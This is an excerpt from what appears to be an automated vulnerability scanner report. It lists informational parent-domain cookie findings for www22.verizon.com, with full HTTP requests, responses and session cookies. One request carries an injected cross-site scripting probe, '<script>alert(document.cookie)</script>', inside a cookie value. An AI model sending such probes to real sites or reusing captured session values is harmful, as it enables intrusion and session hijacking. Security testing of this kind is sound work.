Date: Mon, 05 Sep 2011 22:38:01 GMT
Connection: close
Set-Cookie: ASP.NET_SessionId=; path=/
Set-Cookie: ASP.NET_SessionId=; path=/
Set-Cookie: EOrdering=AffinityCaptcha=NES6zYkqZVIXZHz3xATrXzO2Q%3d%3d; domain=.verizon.com; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Ver
...[SNIP]...

14.89. https://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX?CLIENT=RGA&CUSTTYPE=NEW&SMBBANNERID=ND~LECLS+3YR+1V HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://smallbusiness.verizon.com/products/voice/plans.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; CMS_TimeZoneOffset=300; PDSS=PflowId=680d1ca400d842e69be1848a9f3d28c5; DSS=flowId=f9688e84baaa4126acd87151b526b588; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; ContextInfo_TV=FiOSTV; ECSPCookies=Partner=VZO&SolutionCenter=FiOSTV&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=; IHAClientIP=112.64.2.103; 
RecentlyVisited=Verizon%2520%257C%2520FiOS%2520TV@http%253A//www22.verizon.com/residentialhelp/fiostv%23Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=VwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxAA==&IP=NQAwAC4AMgAzAC4AMQAyADMALgAxADAANgAsACAAOAAwAC4ANgA3AC4ANwA0AC4AMgAxADEALAAgADEAMQAyAC4ANgA0AC4AMQAuADEAMAA3AA==; vzinhomeagent=GUID=OQAwADQAMgAzAGQAMAA1AC0ANwA3ADAAMgAtADQANwAzAGUALQBhAGQAMAA3AC0ANQA3AGMAYwBkADUAYgAyAGMAMQA0ADYA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMQA3ADgAMQA2ADMAOQA5ADwALwBUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4A&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIAUwBUAEIARgByAG8AegBlAG4A&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIAUwBUAEIARgByAG8AegBlAG4APAAvAFQAZQB4AHQAPgA8AC8AVQBzAGUAcgBUAGUAeAB0AD4A&AccountIDAuthMode=bgBvAA==; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc65945525d5f4f58455e445a4a423660; WT_FPC=id=27bb86d4bd1c3b1dd581315275882795:lv=1315275882795:ss=1315275882795; vzapps=ZIPCODE=10010; BPSPANISH=N; CP=null*; refURL=https://www22.verizon.com/ForYourHome/VZRepair/vziha/Service.aspx?ihaweb=WebSTBFrozen; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d; urlreferer=http://smallbusiness.verizon.com/products/voice/plans.aspx; NSC_xxx22_gztncja_80_mcw=ffffffff895bc6ba45525d5f4f58455e445a4a423660

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 54820
Expires: Mon, 05 Sep 2011 22:25:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:25:39 GMT
Connection: keep-alive
Set-Cookie: GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; domain=.verizon.com; path=/
Set-Cookie: SrcClientID=smallbusiness.verizon.com; path=/; secure; HttpOnly


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Verizon | Shop for Services | TV + Internet + Phone</title>


...[SNIP]...

14.90. https://www22.verizon.com/ForYourHome/GoFlow/MyVerizonNew/ACSLogin.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /ForYourHome/GoFlow/MyVerizonNew/ACSLogin.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ForYourHome/GoFlow/MyVerizonNew/ACSLogin.aspx HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 31774
Expires: Mon, 05 Sep 2011 22:38:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:38:01 GMT
Connection: close
Set-Cookie: EOrdering=AffinityCaptcha=NES6zYkqZVIXZHz3xATrXzO2Q%3d%3d&STEP133=NESJBAz%2b%2bFRFcSze8KcWPLg9w%3d%3d&PROJNORTH-CLIENT=; domain=.verizon.com; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
   <title>Verizon | Shop for Services | TV + Internet + Phone</title>
   <meta na
...[SNIP]...

14.91. https://www22.verizon.com/ForYourHome/Goflow/MyVerizon/OneClick/MyVerizonAsync.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /ForYourHome/Goflow/MyVerizon/OneClick/MyVerizonAsync.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ForYourHome/Goflow/MyVerizon/OneClick/MyVerizonAsync.aspx HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; PDSS=PflowId=680d1ca400d842e69be1848a9f3d28c5; DSS=flowId=f9688e84baaa4126acd87151b526b588; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=VwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxAA==&IP=NQAwAC4AMgAzAC4AMQAyADMALgAxADAANgAsACAAOAAwAC4ANgA3AC4ANwA0AC4AMgAxADEALAAgADEAMQAyAC4ANgA0AC4AMQAuADEAMAA3AA==; 
vzinhomeagent=GUID=OQAwADQAMgAzAGQAMAA1AC0ANwA3ADAAMgAtADQANwAzAGUALQBhAGQAMAA3AC0ANQA3AGMAYwBkADUAYgAyAGMAMQA0ADYA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMQA3ADgAMQA2ADMAOQA5ADwALwBUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4A&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIAUwBUAEIARgByAG8AegBlAG4A&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIAUwBUAEIARgByAG8AegBlAG4APAAvAFQAZQB4AHQAPgA8AC8AVQBzAGUAcgBUAGUAeAB0AD4A&AccountIDAuthMode=bgBvAA==; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc65945525d5f4f58455e445a4a423660; WT_FPC=id=27bb86d4bd1c3b1dd581315275882795:lv=1315275882795:ss=1315275882795; vzapps=ZIPCODE=10010; BPSPANISH=N; urlreferer=http://smallbusiness.verizon.com/products/voice/plans.aspx; NSC_xxx22_gztncja_80_mcw=ffffffff895bc6ba45525d5f4f58455e445a4a423660; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; SrcClientID=smallbusiness.verizon.com; vzAppID=; LOB_CATEGORY=; ContextInfo_TV=FiOSTV; IHAClientIP=112.64.2.103; AimsChatURL_Cookie=https://collaborateext.verizon.com; PageTitle=Livechat; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>alert(document.cookie)</script>af81f92fd39; CMS_TimeZoneOffset=300; CP=null*; refURL=http://www22.verizon.com/residentialhelp/phone; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520FiOS%2520TV@http%253A//www22.verizon.com/residentialhelp/fiostv%23Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; 
TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc65c45525d5f4f58455e445a4a423660

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Length: 0
Expires: Mon, 05 Sep 2011 22:42:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:42:02 GMT
Connection: keep-alive
Set-Cookie: ak-sf=false; expires=Mon, 05-Sep-2011 22:47:02 GMT; path=/foryourhome/; domain=verizon.com


14.92. https://www22.verizon.com/ForYourSmallBiz/GoFlow/NationalBundles/BundleQualify.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /ForYourSmallBiz/GoFlow/NationalBundles/BundleQualify.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ForYourSmallBiz/GoFlow/NationalBundles/BundleQualify.aspx?CLIENT=RGA&CUSTTYPE=NEW&SMBBANNERID=ND~LECLS+3YR+1V HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://smallbusiness.verizon.com/products/voice/plans.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; CMS_TimeZoneOffset=300; PDSS=PflowId=680d1ca400d842e69be1848a9f3d28c5; DSS=flowId=f9688e84baaa4126acd87151b526b588; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; ContextInfo_TV=FiOSTV; ECSPCookies=Partner=VZO&SolutionCenter=FiOSTV&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=; IHAClientIP=112.64.2.103; 
RecentlyVisited=Verizon%2520%257C%2520FiOS%2520TV@http%253A//www22.verizon.com/residentialhelp/fiostv%23Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=VwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxAA==&IP=NQAwAC4AMgAzAC4AMQAyADMALgAxADAANgAsACAAOAAwAC4ANgA3AC4ANwA0AC4AMgAxADEALAAgADEAMQAyAC4ANgA0AC4AMQAuADEAMAA3AA==; vzinhomeagent=GUID=OQAwADQAMgAzAGQAMAA1AC0ANwA3ADAAMgAtADQANwAzAGUALQBhAGQAMAA3AC0ANQA3AGMAYwBkADUAYgAyAGMAMQA0ADYA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMQA3ADgAMQA2ADMAOQA5ADwALwBUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4A&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIAUwBUAEIARgByAG8AegBlAG4A&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIAUwBUAEIARgByAG8AegBlAG4APAAvAFQAZQB4AHQAPgA8AC8AVQBzAGUAcgBUAGUAeAB0AD4A&AccountIDAuthMode=bgBvAA==; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc65945525d5f4f58455e445a4a423660; refURL=https://www22.verizon.com/ForYourHome/VZRepair/vziha/Service.aspx?ihaweb=WebSTBFrozen; WT_FPC=id=27bb86d4bd1c3b1dd581315275882795:lv=1315275882795:ss=1315275882795; vzapps=ZIPCODE=10010; BPSPANISH=N; CP=null*

Response

HTTP/1.0 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: HTTPS://WWW22.VERIZON.COM/FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX?CLIENT=RGA&CUSTTYPE=NEW&SMBBANNERID=ND~LECLS+3YR+1V
Content-Type: text/html; charset=utf-8
Content-Length: 261
Expires: Mon, 05 Sep 2011 22:25:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:25:33 GMT
Connection: keep-alive
Set-Cookie: GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; domain=.verizon.com; path=/
Set-Cookie: urlreferer=http://smallbusiness.verizon.com/products/voice/plans.aspx; path=/; secure; HttpOnly

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="HTTPS://WWW22.VERIZON.COM/FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX?CLIENT=RGA&amp;CUSTTYPE=NEW&amp;
...[SNIP]...

14.93. https://www22.verizon.com/content/VerizonGlobalHome/validlogin.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /content/VerizonGlobalHome/validlogin.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/VerizonGlobalHome/validlogin.aspx HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: https://www22.verizon.com/content/verizonglobalhome/res_signin.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; vsrecentsearches=wss~xss~xss%20sq~~; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; CP=null*; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/javascript; charset=utf-8
Content-Length: 638
Cache-Control: private, max-age=1791
Date: Mon, 05 Sep 2011 22:19:46 GMT
Connection: keep-alive
Set-Cookie: ak-sf=false; expires=Mon, 05-Sep-2011 22:24:46 GMT; path=/content/; domain=verizon.com

var aType=new Array("retailconsumer","retailgeneralbiz","eservices");var aLOB=new Array("myvz","myvzquickpay","concos","rescos","smbcos","retailgenbiz","retailconsumer","callassistant");var ckType='';
...[SNIP]...

14.94. https://www22.verizon.com/includes/cache/15/blank.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /includes/cache/15/blank.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /includes/cache/15/blank.html HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://smallbusiness.verizon.com/products/voice/plans.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; CP=null*; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~

Response

HTTP/1.0 200 OK
Content-Length: 0
Content-Type: text/html
Last-Modified: Fri, 07 May 2010 18:39:58 GMT
